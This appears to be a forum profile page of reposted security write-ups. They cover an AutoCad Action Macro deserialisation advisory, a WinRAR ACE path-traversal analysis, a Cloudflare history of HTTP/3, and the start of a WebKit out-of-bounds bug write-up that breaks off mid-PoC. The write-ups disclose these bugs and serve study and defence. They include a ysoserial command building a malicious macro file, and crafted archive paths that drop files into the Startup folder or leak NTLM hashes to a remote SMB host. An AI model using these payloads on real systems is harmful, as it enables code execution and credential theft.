Everything posted by Nytro
-
AutoCad .NET Deserialisation Vulnerability

Product: AutoCad
Severity: Medium
CVE Reference: CVE-2019-7361
Type: Code Execution

Description

The Action Macro functionality of AutoDesk’s AutoCad software suite is vulnerable to code execution due to improper validation of user input passed to a deserialization call. AutoCad provides the ability to automate a set of tasks by recording the user performing those tasks and replaying them later. This functionality is called Action Macros. Before playing an Action Macro, the list of actions performed is presented to the user, as shown in the next figure. This recording will create a number of “DONUT” objects within the current drawing.

Once an Action Macro has been recorded, it is saved to the user’s “Actions” directory as a .actm file. A snippet of the underlying data of the Action Macro file for the above recording is shown below. This data is made up of a number of .NET serialized objects. Highlighted in red is the length of the first object (of type AutoDesk.AutoCad.MacroRecorder.MacroNode). The green outline highlights the actual object, and the blue is the beginning of the next object. It should be noted that this data is deserialized to allow the user to view the tree of actions within a recording prior to the user clicking “play”.

The vulnerability ultimately lies in AcMR.dll, specifically the method AutoDesk.AutoCad.MacroRecorder.BaseNode.Load:

public static INode Load(Stream stream)
{
    if (!DebugUtil.Verify(stream != null))
        return (INode) null;
    object obj = MacroManager.Formatter.Deserialize(stream);   // (2)
    if (DebugUtil.Verify(obj is INode))                        // (3)
        return obj as INode;
    return (INode) null;
}

public void Save(Stream stream)
{
    if (!DebugUtil.Verify(stream != null))
        return;
    MacroManager.Formatter.Serialize(stream, (object) this);   // (1)
}

At (1) the object is saved using MacroManager.Formatter’s Serialize method – this occurs when an Action Macro is saved. At (2), the user-supplied input stream is deserialized prior to being checked as a valid INode object at (3). These actions occur when the Action Macro is loaded into memory. The MacroManager.Formatter.Deserialize method is a wrapper around the .NET BinaryFormatter class:

public static IFormatter Formatter
{
    get
    {
        if (MacroManager.m_formatter == null)
        {
            MacroManager.m_formatter = (IFormatter) new BinaryFormatter();
            MacroManager.m_formatter.Binder = (SerializationBinder) new MacroManager.TypeRedirectionBinder();
        }
        return MacroManager.m_formatter;
    }
}

A malicious user is able to gain code execution by replacing the legitimate serialized objects in an Action Macro file. As a proof of concept, the ysoserial.net tool was used to generate a series of .NET gadgets that, when deserialised, would cause a calculator to be opened. The command used for this proof of concept was:

ysoserial.exe -o raw -g TypeConfuseDelegate -c "calc.exe" -f BinaryFormatter > poc_calc_action_macro.actm

Code execution occurs when a user attempts to view the actions within an Action Macro, which happens directly prior to replaying it, as demonstrated in the next figure. Note that the Action Macro is never “played”.

Impact

This vulnerability is of medium risk to end users. Code execution occurs in the context of the current user; no extra privileges are gained. The potential attack vector could be through phishing of end users, whereby they are coerced into playing malicious Action Macros believing them to be legitimate.
The most likely scenario could involve a malicious actor sharing an Action Macro file online that supposedly solves a community problem.

Solution

As of February 1st 2019, AutoDesk have released a patch mitigating this vulnerability. Users are advised to update AutoCad to the most recent version available. AutoDesk have also produced the following advisory pertaining to this vulnerability as well as a number of others [2].

References

[1] ysoserial.net - https://github.com/pwntester/ysoserial.net/tree/master/ysoserial
[2] AutoDesk Advisory - https://www.autodesk.com/trust/security-advisories/adsk-sa-2019-0001

Source: https://labs.mwrinfosecurity.com/advisories/autocad-net-deserialisation-vulnerability/
-
Investigating WinRAR Code Execution Vulnerability (CVE-2018-20250) at Internet Scale
Posted on February 22, 2019. Authors: lywang, dannywei

0x00 Background

As one of the most popular archiving tools, WinRAR supports compression and decompression of multiple archive formats. Check Point security researcher Nadav Grossman recently disclosed a series of security vulnerabilities he found in WinRAR, the most powerful one being a remote code execution vulnerability in the ACE archive decompression module (CVE-2018-20250). To support decompression of ACE archives, WinRAR integrated a 19-year-old dynamic link library, unacev2.dll, which has not been updated since 2006 and does not enable any kind of exploit mitigation technology. Nadav Grossman uncovered a directory traversal bug in unacev2.dll which could allow an attacker to execute arbitrary code or leak Net-NTLM hashes.

0x01 Description

The ACE archive decompression module unacev2.dll fails to properly filter relative paths when validating the target path. An attacker can trick the program into directly using a relative path as the target path. By placing a malicious executable in a system startup folder, this can lead to arbitrary code execution.

0x02 Root Cause

unacev2.dll validates the destination path before extracting files from ACE archives. It reads file_relative_path from the archive file and uses GetDevicePathLen(file_relative_path) to validate the path. The path concatenation is performed according to the return value of that function, as shown in the following diagram: (Source: https://research.checkpoint.com/extracting-code-execution-from-winrar/)

When GetDevicePathLen(file_relative_path) returns 0, it concatenates the target path with the relative path from the archive to form the final path:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

Otherwise, it directly uses the relative path as the final path:

sprintf(final_file_path, "%s%s", "", file_relative_path);

If an attacker can craft a malicious relative path that bypasses multiple filter and validation functions such as StateCallbackProc() and unacev2.dll!CleanPath(), and makes unacev2.dll!GetDevicePathLen(file_relative_path) return a non-zero value, the malicious relative path will be used as the final path for decompression. Nadav Grossman successfully crafted two such paths:

# | Malicious Path | Final Path
1 | C:\C:\some_folder\some_file.ext | C:\some_folder\some_file.ext
2 | C:\\10.10.10.10\smb_folder_name\some_folder\some_file.ext | \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Variation 1: the attacker can place a file at an arbitrary path on the victim’s computer.
Variation 2: the attacker can steal the victim’s Net-NTLM hash and then perform an NTLM relay attack to execute code on the victim’s computer.

It is worth mentioning that WinRAR runs with normal user privileges. Therefore, an attacker cannot place a file in the common startup folder (“C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”). Placing a file in the user startup folder (“C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”) requires guessing or brute-forcing a valid user name. However, in the most common scenario, where victims download an archive to the Desktop (C:\Users\<user name>\Desktop) or Downloads (C:\Users\<user name>\Downloads) folder and then extract it in place, the working directory of WinRAR is the same as that of the archive file. By using directory traversal, the attacker can drop the payload into the Startup folder without guessing a user name.
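Before looking at the concrete exploit path, the branch selection described in the root cause section above can be sketched roughly in C. This is a simplified illustration only: get_device_path_len() is a hypothetical stand-in for unacev2.dll!GetDevicePathLen(), and the CleanPath() filtering step is omitted.

#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for GetDevicePathLen(): returns the length of a
 * leading device specifier ("C:\" or a UNC prefix) or 0 if the path has
 * no device component. Simplified for illustration only. */
static unsigned get_device_path_len(const char *path)
{
    if (strlen(path) >= 3 && path[1] == ':' && path[2] == '\\')
        return 3;                       /* drive-letter prefix, e.g. "C:\"      */
    if (path[0] == '\\' && path[1] == '\\')
        return 2;                       /* UNC prefix, e.g. "\\10.10.10.10\..." */
    return 0;
}

int main(void)
{
    const char *destination_folder = "C:\\Users\\victim\\Downloads\\extracted\\";
    /* relative path taken straight from the ACE archive header */
    const char *file_relative_path = "C:\\C:\\some_folder\\some_file.ext";
    char final_file_path[1024];

    if (get_device_path_len(file_relative_path) == 0)
        /* intended behaviour: extract under the chosen destination folder */
        snprintf(final_file_path, sizeof(final_file_path), "%s%s",
                 destination_folder, file_relative_path);
    else
        /* flawed branch: the attacker-controlled path is used verbatim */
        snprintf(final_file_path, sizeof(final_file_path), "%s%s",
                 "", file_relative_path);

    printf("extracting to: %s\n", final_file_path);
    return 0;
}

Because the crafted path starts with a drive-letter prefix, the sketch takes the second branch and the destination folder chosen by the user is ignored entirely.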
Nadav Grossman crafted the following path to build a remote code execution exploit:

"C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"

0x03 Affected Software

As a shared library, unacev2.dll is also used by other software that supports ACE file decompression. These programs are affected by this vulnerability as well. Our Project A’Tuin system scans software at internet scale, and we scanned through all software that uses this shared library. The following diagram shows the version distribution of this library. Project A’Tuin can also trace shared libraries back to their dependent software. We currently observe that 15 Chinese and 24 non-Chinese software products are affected. Most of them can be categorized as utility software: among them are at least 9 file archivers and 8 file explorers / commanders. Many other programs seem to simply include the unacev2.dll module as part of the WinRAR package for their own file decompression needs.

0x04 Mitigations

WinRAR released version 5.70 Beta 1 to patch this vulnerability. Since the vendor of unacev2.dll went out of business in August 2017 and it is a closed-source product, WinRAR decided to remove the ACE decompression feature from WinRAR entirely. 360Zip has also patched this vulnerability by removing unacev2.dll. For users of other affected products, we suggest contacting the vendor for an updated version. If no updated version is available, users can temporarily work around this vulnerability by removing unacev2.dll from the installation directory.

0x05 References

[1] Extracting a 19 Year Old Code Execution from WinRAR
https://research.checkpoint.com/extracting-code-execution-from-winrar/
[2] ACE (compressed file format)
https://en.wikipedia.org/wiki/ACE_(compressed_file_format)

Source: https://xlab.tencent.com/en/2019/02/22/investigating-winrar-code-execution-vulnerability-cve-2018-20250-at-internet-scale/
-
HTTP/3: From root to tip 24 Jan 2019 by Lucas Pardue. HTTP is the application protocol that powers the Web. It began life as the so-called HTTP/0.9 protocol in 1991, and by 1999 had evolved to HTTP/1.1, which was standardised within the IETF (Internet Engineering Task Force). HTTP/1.1 was good enough for a long time but the ever changing needs of the Web called for a better suited protocol, and HTTP/2 emerged in 2015. More recently it was announced that the IETF is intending to deliver a new version - HTTP/3. To some people this is a surprise and has caused a bit of confusion. If you don't track IETF work closely it might seem that HTTP/3 has come out of the blue. However, we can trace its origins through a lineage of experiments and evolution of Web protocols; specifically the QUIC transport protocol. If you're not familiar with QUIC, my colleagues have done a great job of tackling different angles. John's blog describes some of the real-world annoyances of today's HTTP, Alessandro's blog tackles the nitty-gritty transport layer details, and Nick's blog covers how to get hands on with some testing. We've collected these and more at https://cloudflare-quic.com. And if that tickles your fancy, be sure to check out quiche, our own open-source implementation of the QUIC protocol written in Rust. HTTP/3 is the HTTP application mapping to the QUIC transport layer. This name was made official in the recent draft version 17 (draft-ietf-quic-http-17), which was proposed in late October 2018, with discussion and rough consensus being formed during the IETF 103 meeting in Bangkok in November. HTTP/3 was previously known as HTTP over QUIC, which itself was previously known as HTTP/2 over QUIC. Before that we had HTTP/2 over gQUIC, and way back we had SPDY over gQUIC. The fact of the matter, however, is that HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. In this blog post we'll explore the history behind some of HTTP/3's previous names and present the motivation behind the most recent name change. We'll go back to the early days of HTTP and touch on all the good work that has happened along the way. If you're keen to get the full picture you can jump to the end of the article or open this highly detailed SVG version. An HTTP/3 layer cake Setting the scene Just before we focus on HTTP, it is worth reminding ourselves that there are two protocols that share the name QUIC. As we explained previously, gQUIC is commonly used to identify Google QUIC (the original protocol), and QUIC is commonly used to represent the IETF standard-in-progress version that diverges from gQUIC. Since its early days in the 90s, the web’s needs have changed. We've had new versions of HTTP and added user security in the shape of Transport Layer Security (TLS). We'll only touch on TLS in this post, our other blog posts are a great resource if you want to explore that area in more detail. To help me explain the history of HTTP and TLS, I started to collate details of protocol specifications and dates. This information is usually presented in a textual form such as a list of bullets points stating document titles, ordered by date. However, there are branching standards, each overlapping in time and a simple list cannot express the real complexity of relationships. 
In HTTP, there has been parallel work that refactors core protocol definitions for easier consumption, extends the protocol for new uses, and redefines how the protocol exchanges data over the Internet for performance. When you're trying to join the dots over nearly 30 years of Internet history across different branching work streams you need a visualisation. So I made one - the Cloudflare Secure Web Timeline. (NB: Technically it is a Cladogram, but the term timeline is more widely known). I have applied some artistic license when creating this, choosing to focus on the successful branches in the IETF space. Some of the things not shown include efforts in the W3 Consortium HTTP-NG working group, along with some exotic ideas whose authors are keen on explaining how to pronounce them: HMURR (pronounced 'hammer') and WAKA (pronounced “wah-kah”).

In the next few sections I'll walk this timeline to explain critical chapters in the history of HTTP. To enjoy the takeaways from this post, it helps to have an appreciation of why standardisation is beneficial, and how the IETF approaches it. Therefore we'll start with a very brief overview of that topic before returning to the timeline itself. Feel free to skip the next section if you are already familiar with the IETF.

Types of Internet standard

Generally, standards define common terms of reference, scope, constraint, applicability, and other considerations. Standards exist in many shapes and sizes, and can be informal (aka de facto) or formal (agreed/published by a Standards Defining Organisation such as the IETF, ISO or MPEG). Standards are used in many fields; there is even a formal British Standard for making tea - BS 6008. The early Web used HTTP and SSL protocol definitions that were published outside the IETF; these are marked as red lines on the Secure Web Timeline. The uptake of these protocols by clients and servers made them de facto standards.

At some point, it was decided to formalise these protocols (some motivating reasons are described in a later section). Internet standards are commonly defined in the IETF, which is guided by the informal principle of "rough consensus and running code". This is grounded in experience of developing and deploying things on the Internet, and is in contrast to a "clean room" approach of trying to develop perfect protocols in a vacuum. IETF Internet standards are commonly known as RFCs. This is a complex area to explain, so I recommend reading the blog post "How to Read an RFC" by the QUIC Working Group Co-chair Mark Nottingham.

A Working Group, or WG, is more or less just a mailing list. Each year the IETF holds three meetings that provide the time and facilities for all WGs to meet in person if they wish. The agenda for these weeks can become very congested, with limited time available to discuss highly technical areas in depth. To overcome this, some WGs choose to also hold interim meetings in the months between the general IETF meetings. This can help to maintain momentum on specification development. The QUIC WG has held several interim meetings since 2017; a full list is available on their meeting page. These IETF meetings also provide the opportunity for other IETF-related collections of people to meet, such as the Internet Architecture Board or the Internet Research Task Force. In recent years, an IETF Hackathon has been held during the weekend preceding the IETF meeting.
This provides an opportunity for the community to develop running code and, importantly, to carry out interoperability testing in the same room with others. This helps to find issues in specifications that can be discussed in the following days. For the purposes of this blog, the important thing to understand is that RFCs don't just spring into existence. Instead, they go through a process that usually starts with an IETF Internet Draft (I-D) format that is submitted for consideration of adoption. In the case where there is already a published specification, preparation of an I-D might just be a simple reformatting exercise. I-Ds have a 6 month active lifetime from the date of publication. To keep them active, new versions need to be published. In practice, there is not much consequence to letting an I-D elapse and it happens quite often. The documents continue to be hosted on the IETF's document website for anyone that wants to read them.

I-Ds are represented on the Secure Web Timeline as purple lines. Each one has a unique name that takes the form of draft-{author name}-{working group}-{topic}-{version}. The working group field is optional; it might predict the IETF WG that will work on the piece, and sometimes this changes. If an I-D is adopted by the IETF, or if the I-D was initiated directly within the IETF, the name is draft-ietf-{working group}-{topic}-{version}. I-Ds may branch, merge or die on the vine. The version starts at 00 and increases by 1 each time a new draft is released. For example, the 4th draft of an I-D will have the version 03. Any time that an I-D changes name, its version resets back to 00.

It is important to note that anyone can submit an I-D to the IETF; you should not consider these as standards. But, if the IETF standardisation process of an I-D does reach consensus, and the final document passes review, we finally get an RFC. The name changes again at this stage. Each RFC gets a unique number e.g. RFC 7230. These are represented as blue lines on the Secure Web Timeline. RFCs are immutable documents. This means that changes to the RFC require a completely new number. Changes might be made in order to incorporate fixes for errata (editorial or technical errors that were found and reported) or simply to refactor the specification to improve layout. RFCs may obsolete older versions (complete replacement), or just update them (substantively change).

All IETF documents are openly available on http://tools.ietf.org. Personally I find the IETF Datatracker a little more user friendly because it provides a visualisation of a document's progress from I-D to RFC. Below is an example that shows the development of RFC 1945 - HTTP/1.0, and it is a clear source of inspiration for the Secure Web Timeline.

IETF Datatracker view of RFC 1945

Interestingly, in the course of my work I found that the above visualisation is incorrect. It is missing draft-ietf-http-v10-spec-05 for some reason. Since the I-D lifetime is 6 months, there appears to be a gap before it became an RFC, whereas in reality draft 05 was still active through until August 1996.

Exploring the Secure Web Timeline

With a small appreciation of how Internet standards documents come to fruition, we can start to walk the Secure Web Timeline. In this section are a number of excerpt diagrams that show an important part of the timeline. Each dot represents the date that a document or capability was made available. For IETF documents, draft numbers are omitted for clarity.
However, if you want to see all that detail please check out the complete timeline.

HTTP began life as the so-called HTTP/0.9 protocol in 1991, and in 1994 the I-D draft-fielding-http-spec-00 was published. This was adopted by the IETF soon after, causing the name change to draft-ietf-http-v10-spec-00. The I-D went through 6 draft versions before being published as RFC 1945 - HTTP/1.0 in 1996.

However, even before the HTTP/1.0 work completed, a separate activity started on HTTP/1.1. The I-D draft-ietf-http-v11-spec-00 was published in November 1995 and was formally published as RFC 2068 in 1997. The keen eyed will spot that the Secure Web Timeline doesn't quite capture that sequence of events; this is an unfortunate side effect of the tooling used to generate the visualisation. I tried to minimise such problems where possible.

An HTTP/1.1 revision exercise was started in mid-1997 in the form of draft-ietf-http-v11-spec-rev-00. This completed in 1999 with the publication of RFC 2616. Things went quiet in the IETF HTTP world until 2007. We'll come back to that shortly.

A History of SSL and TLS

Switching tracks to SSL. We see that the SSL 2.0 specification was released sometime around 1995, and that SSL 3.0 was released in November 1996. Interestingly, SSL 3.0 is described by RFC 6101, which was released in August 2011. This sits in the Historic category, which "is usually done to document ideas that were considered and discarded, or protocols that were already historic when it was decided to document them." according to the IETF. In this case it is advantageous to have an IETF-owned document that describes SSL 3.0 because it can be used as a canonical reference elsewhere.

Of more interest to us is how SSL inspired the development of TLS, which began life as draft-ietf-tls-protocol-00 in November 1996. This went through 6 draft versions and was published as RFC 2246 - TLS 1.0 at the start of 1999.

Between 1995 and 1999, the SSL and TLS protocols were used to secure HTTP communications on the Internet. This worked just fine as a de facto standard. It wasn't until January 1998 that the formal standardisation process for HTTPS was started with the publication of the I-D draft-ietf-tls-https-00. That work concluded in May 2000 with the publication of RFC 2818 - HTTP Over TLS.

TLS continued to evolve between 2000 and 2007, with the standardisation of TLS 1.1 and 1.2. There was a gap of 7 years until work began on the next version of TLS, which was adopted as draft-ietf-tls-tls13-00 in April 2014 and, after 28 drafts, completed as RFC 8446 - TLS 1.3 in August 2018.

Internet standardisation process

After taking a small look at the timeline, I hope you can build a sense of how the IETF works. One generalisation for the way that Internet standards take shape is that researchers or engineers design experimental protocols that suit their specific use case. They experiment with protocols, in public or private, at various levels of scale. The data helps to identify improvements or issues. The work may be published to explain the experiment, to gather wider input or to help find other implementers. Take up of this early work by others may make it a de facto standard; eventually there may be sufficient momentum that formal standardisation becomes an option.

The status of a protocol can be an important consideration for organisations that may be thinking about implementing, deploying or in some way using it.
A formal standardisation process can make a de facto standard more attractive because it tends to provide stability. The stewardship and guidance is provided by an organisation, such as the IETF, that reflects a wider range of experiences. However, it is worth highlighting that not all formal standards succeed.

The process of creating a final standard is almost as important as the standard itself. Taking an initial idea and inviting contribution from people with wider knowledge, experience and use cases can help produce something that will be of more use to a wider population. However, the standardisation process is not always easy. There are pitfalls and hurdles. Sometimes the process takes so long that the output is no longer relevant.

Each Standards Defining Organisation tends to have its own process that is geared around its field and participants. Explaining all of the details about how the IETF works is well beyond the scope of this blog. The IETF's "How we work" page is an excellent starting point that covers many aspects. The best method of forming an understanding, as usual, is to get involved yourself. This can be as easy as joining an email list or adding to discussion on a relevant GitHub repository.

Cloudflare's running code

Cloudflare is proud to be an early adopter of new and evolving protocols. We have a long record of adopting new standards early, such as HTTP/2. We also test features that are experimental or yet to be final, like TLS 1.3 and SPDY. In relation to the IETF standardisation process, deploying this running code on real networks across a diverse body of websites helps us understand how well the protocol will work in practice. We combine our existing expertise with experimental information to help improve the running code and, where it makes sense, feed back issues or improvements to the WG that is standardising a protocol.

Testing new things is not the only priority. Part of being an innovator is knowing when it is time to move forward and put older innovations in the rear view mirror. Sometimes this relates to security-oriented protocols; for example, Cloudflare disabled SSLv3 by default due to the POODLE vulnerability. In other cases, protocols become superseded by a more technologically advanced one; Cloudflare deprecated SPDY support in favour of HTTP/2.

The introduction and deprecation of relevant protocols are represented on the Secure Web Timeline as orange lines. Dotted vertical lines help correlate Cloudflare events to relevant IETF documents. For example, Cloudflare introduced TLS 1.3 support in September 2016, with the final document, RFC 8446, being published almost two years later in August 2018.

Refactoring in HTTPbis

HTTP/1.1 is a very successful protocol and the timeline shows that there wasn't much activity in the IETF after 1999. However, the true reflection is that years of active use gave implementation experience that unearthed latent issues with RFC 2616, which caused some interoperability issues. Furthermore, the protocol was extended by other RFCs like 2817 and 2818. It was decided in 2007 to kickstart a new activity to improve the HTTP protocol specification. This was called HTTPbis (where "bis" stems from Latin meaning "two", "twice" or "repeat") and it took the form of a new Working Group. The original charter does a good job of describing the problems that were trying to be solved. In short, HTTPbis decided to refactor RFC 2616.
It would incorporate errata fixes and buy in some aspects of other specifications that had been published in the meantime. It was decided to split the document up into parts. This resulted in 6 I-Ds published in December 2007:

draft-ietf-httpbis-p1-messaging
draft-ietf-httpbis-p2-semantics
draft-ietf-httpbis-p4-conditional
draft-ietf-httpbis-p5-range
draft-ietf-httpbis-p6-cache
draft-ietf-httpbis-p7-auth

The diagram shows how this work progressed through a lengthy drafting process of 7 years, with 27 draft versions being released, before final standardisation. In June 2014, the so-called RFC 723x series was released (where x ranges from 0 to 5). The Chair of the HTTPbis WG celebrated this achievement with the acclamation "RFC2616 is Dead". If it wasn't clear, these new documents obsoleted the older RFC 2616.

What does any of this have to do with HTTP/3?

While the IETF was busy working on the RFC 723x series the world didn't stop. People continued to enhance, extend and experiment with HTTP on the Internet. Among them were Google, who had started to experiment with something called SPDY (pronounced speedy). This protocol was touted as improving the performance of web browsing, a principal use case for HTTP. At the end of 2009 SPDY v1 was announced, and it was quickly followed by SPDY v2 in 2010.

I want to avoid going into the technical details of SPDY. That's a topic for another day. What is important is to understand that SPDY took the core paradigms of HTTP and modified the interchange format slightly in order to gain improvements. With hindsight, we can see that HTTP has clearly delimited semantics and syntax. Semantics describe the concept of request and response exchanges including: methods, status codes, header fields (metadata) and bodies (payload). Syntax describes how to map semantics to bytes on the wire.

HTTP/0.9, 1.0 and 1.1 share many semantics. They also share syntax in the form of character strings that are sent over TCP connections. SPDY took HTTP/1.1 semantics and changed the syntax from strings to binary. This is a really interesting topic but we will go no further down that rabbit hole today.

Google's experiments with SPDY showed that there was promise in changing HTTP syntax, and value in keeping the existing HTTP semantics. For example, keeping the format of URLs to use https:// avoided many problems that could have affected adoption. Having seen some of the positive outcomes, the IETF decided it was time to consider what HTTP/2.0 might look like. The slides from the HTTPbis session held during IETF 83 in March 2012 show the requirements, goals and measures of success that were set out. It also clearly states that "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x".

During that meeting the community was invited to share proposals. I-Ds that were submitted for consideration included draft-mbelshe-httpbis-spdy-00, draft-montenegro-httpbis-speed-mobility-00 and draft-tarreau-httpbis-network-friendly-00. Ultimately, the SPDY draft was adopted and in November 2012 work began on draft-ietf-httpbis-http2-00. After 18 drafts across a period of just over 2 years, RFC 7540 - HTTP/2 was published in 2015. During this specification period, the precise syntax of HTTP/2 diverged just enough to make HTTP/2 and SPDY incompatible. These years were a very busy period for the HTTP-related work at the IETF, with the HTTP/1.1 refactor and HTTP/2 standardisation taking place in parallel.
This is in stark contrast to the many years of quiet in the early 2000s. Be sure to check out the full timeline to really appreciate the amount of work that took place.

Although HTTP/2 was in the process of being standardised, there was still benefit to be had from using and experimenting with SPDY. Cloudflare introduced support for SPDY in August 2012 and only deprecated it in February 2018 when our statistics showed that less than 4% of Web clients continued to want SPDY. Meanwhile, we introduced HTTP/2 support in December 2015, not long after the RFC was published, when our analysis indicated that a meaningful proportion of Web clients could take advantage of it.

Web client support of the SPDY and HTTP/2 protocols preferred the secure option of using TLS. The introduction of Universal SSL in September 2014 helped ensure that all websites signed up to Cloudflare were able to take advantage of these new protocols as we introduced them.

gQUIC

Google continued to experiment, and between 2012 and 2015 they released SPDY v3 and v3.1. They also started working on gQUIC (pronounced, at the time, as quick) and the initial public specification was made available in early 2012.

The early versions of gQUIC made use of the SPDY v3 form of HTTP syntax. This choice made sense because HTTP/2 was not yet finished. The SPDY binary syntax was packaged into QUIC packets that could be sent in UDP datagrams. This was a departure from the TCP transport that HTTP traditionally relied on. When stacked up all together this looked like:

SPDY over gQUIC layer cake

gQUIC used clever tricks to achieve performance. One of these was to break the clear layering between application and transport. What this meant in practice was that gQUIC only ever supported HTTP. So much so that gQUIC, termed "QUIC" at the time, was synonymous with being the next candidate version of HTTP. Despite the continued changes to QUIC over the last few years, which we'll touch on momentarily, to this day the term QUIC is understood by people to mean that initial HTTP-only variant. Unfortunately this is a regular source of confusion when discussing the protocol.

gQUIC continued to experiment and eventually switched over to a syntax much closer to HTTP/2. So close in fact that most people simply called it "HTTP/2 over QUIC". However, because of technical constraints there were some very subtle differences. One example relates to how the HTTP headers were serialized and exchanged. It is a minor difference but in effect means that HTTP/2 over gQUIC was incompatible with the IETF's HTTP/2.

Last but not least, we always need to consider the security aspects of Internet protocols. gQUIC opted not to use TLS to provide security. Instead Google developed a different approach called QUIC Crypto. One of the interesting aspects of this was a new method for speeding up security handshakes. A client that had previously established a secure session with a server could reuse information to do a "zero round-trip time", or 0-RTT, handshake. 0-RTT was later incorporated into TLS 1.3.

Are we at the point where you can tell me what HTTP/3 is yet?

Almost. By now you should be familiar with how standardisation works and gQUIC is not much different. There was sufficient interest that the Google specifications were written up in I-D format. In June 2015 draft-tsvwg-quic-protocol-00, entitled "QUIC: A UDP-based Secure and Reliable Transport for HTTP/2", was submitted. Keep in mind my earlier statement that the syntax was almost-HTTP/2.
Google announced that a Bar BoF would be held at IETF 93 in Prague. For those curious about what a "Bar BoF" is, please consult RFC 6771. Hint: BoF stands for Birds of a Feather.

The outcome of this engagement with the IETF was, in a nutshell, that QUIC seemed to offer many advantages at the transport layer and that it should be decoupled from HTTP. The clear separation between layers should be re-introduced. Furthermore, there was a preference for returning back to a TLS-based handshake (which wasn't so bad since TLS 1.3 was underway at this stage, and it was incorporating 0-RTT handshakes). About a year later, in 2016, a new set of I-Ds were submitted:

draft-hamilton-quic-transport-protocol-00
draft-thomson-quic-tls-00
draft-iyengar-quic-loss-recovery-00
draft-shade-quic-http2-mapping-00

Here's where another source of confusion about HTTP and QUIC enters the fray. draft-shade-quic-http2-mapping-00 is entitled "HTTP/2 Semantics Using The QUIC Transport Protocol" and it describes itself as "a mapping of HTTP/2 semantics over QUIC". However, this is a misnomer. HTTP/2 was about changing syntax while maintaining semantics. Furthermore, "HTTP/2 over gQUIC" was never an accurate description of the syntax either, for the reasons I outlined earlier. Hold that thought.

This IETF version of QUIC was to be an entirely new transport protocol. That's a large undertaking and before diving head-first into such commitments, the IETF likes to gauge actual interest from its members. To do this, a formal Birds of a Feather meeting was held at the IETF 96 meeting in Berlin in 2016. I was lucky enough to attend the session in person and the slides don't do it justice. The meeting was attended by hundreds, as shown by Adam Roach's photograph. At the end of the session consensus was reached; QUIC would be adopted and standardised at the IETF.

The first IETF QUIC I-D for mapping HTTP to QUIC, draft-ietf-quic-http-00, took the Ronseal approach and simplified its name to "HTTP over QUIC". Unfortunately, it didn't finish the job completely and there were many instances of the term HTTP/2 throughout the body. Mike Bishop, the I-D's new editor, identified this and started to fix the HTTP/2 misnomer. In the 01 draft, the description changed to "a mapping of HTTP semantics over QUIC". Gradually, over time and versions, the use of the term "HTTP/2" decreased and the instances became mere references to parts of RFC 7540.

Roll forward two years to October 2018 and the I-D is now at version 16. While HTTP over QUIC bears similarity to HTTP/2, it ultimately is an independent, non-backwards compatible HTTP syntax. However, to those that don't track IETF development very closely (a very very large percentage of the Earth's population), the document name doesn't capture this difference. One of the main points of standardisation is to aid communication and interoperability. Yet a simple thing like naming is a major contributor to confusion in the community.

Recall what was said in 2012, "HTTP/2.0 only signifies that the wire format isn't compatible with that of HTTP/1.x". The IETF followed that existing cue. After much deliberation in the lead up to, and during, IETF 103, consensus was reached to rename "HTTP over QUIC" to HTTP/3. The world is now in a better place and we can move on to more important debates.

But RFC 7230 and 7231 disagree with your definition of semantics and syntax!

Sometimes document titles can be confusing.
The present HTTP documents that describe syntax and semantics are:

RFC 7230 - Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing
RFC 7231 - Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content

It is possible to read too much into these names and believe that fundamental HTTP semantics are specific to versions of HTTP, i.e. HTTP/1.1. However, this is an unintended side effect of the HTTP family tree. The good news is that the HTTPbis Working Group are trying to address this. Some brave members are going through another round of document revision, as Roy Fielding put it, "one more time!". This work is underway right now and is known as the HTTP Core activity (you may also have heard of this under the moniker HTTPtre or HTTPter; naming things is hard). This will condense the six drafts down to three:

HTTP Semantics (draft-ietf-httpbis-semantics)
HTTP Caching (draft-ietf-httpbis-caching)
HTTP/1.1 Message Syntax and Routing (draft-ietf-httpbis-messaging)

Under this new structure, it becomes more evident that HTTP/2 and HTTP/3 are syntax definitions for the common HTTP semantics. This doesn't mean they don't have their own features beyond syntax but it should help frame discussion going forward.

Pulling it all together

This blog post has taken a shallow look at the standardisation process for HTTP in the IETF across the last three decades. Without touching on many technical details, I've tried to explain how we have ended up with HTTP/3 today. If you skipped the good bits in the middle and are looking for a one liner, here it is: HTTP/3 is just a new HTTP syntax that works on IETF QUIC, a UDP-based multiplexed and secure transport. There are many interesting technical areas to explore further but that will have to wait for another day.

In the course of this post, we explored important chapters in the development of HTTP and TLS but did so in isolation. We close out the blog by pulling them all together into the complete Secure Web Timeline presented below. You can use this to investigate the detailed history at your own comfort. And for the super sleuths, be sure to check out the full version including draft numbers.

Source: https://blog.cloudflare.com/http-3-from-root-to-tip/
-
CVE-2018-4441: OOB R/W via JSArray::unshiftCountWithArrayStorage (WebKit)
Feb 15, 2019

In this write-up, we’ll be going through the ins and outs of CVE-2018-4441, which was reported by lokihardt of Google Project Zero.

Overview

bool JSArray::shiftCountWithArrayStorage(VM& vm, unsigned startIndex, unsigned count, ArrayStorage* storage)
{
    unsigned oldLength = storage->length();
    RELEASE_ASSERT(count <= oldLength);

    // If the array contains holes or is otherwise in an abnormal state,
    // use the generic algorithm in ArrayPrototype.
    if ((storage->hasHoles() && this->structure(vm)->holesMustForwardToPrototype(vm, this))
        || hasSparseMap()
        || shouldUseSlowPut(indexingType())) {
        return false;
    }

    if (!oldLength)
        return true;

    unsigned length = oldLength - count;

    storage->m_numValuesInVector -= count;
    storage->setLength(length);
    // [...]

Considering the comment, I think the method is supposed to prevent an array with holes from going through to the code “storage->m_numValuesInVector -= count”. But that kind of array can actually get there simply by having the holesMustForwardToPrototype method return false. Unless the array has any indexed accessors on it or Proxy objects in the prototype chain, the method will just return false. So “storage->m_numValuesInVector” can be controlled by the user. In the PoC, it changes m_numValuesInVector to 0xfffffff0, which equals the new length, making the hasHoles method return false and leading to OOB reads/writes in the JSArray::unshiftCountWithArrayStorage method.

PoC

function main() {
    // [1]
    let arr = [1];
    // [2]
    arr.length = 0x100000;
    // [3]
    arr.splice(0, 0x11);
    // [4]
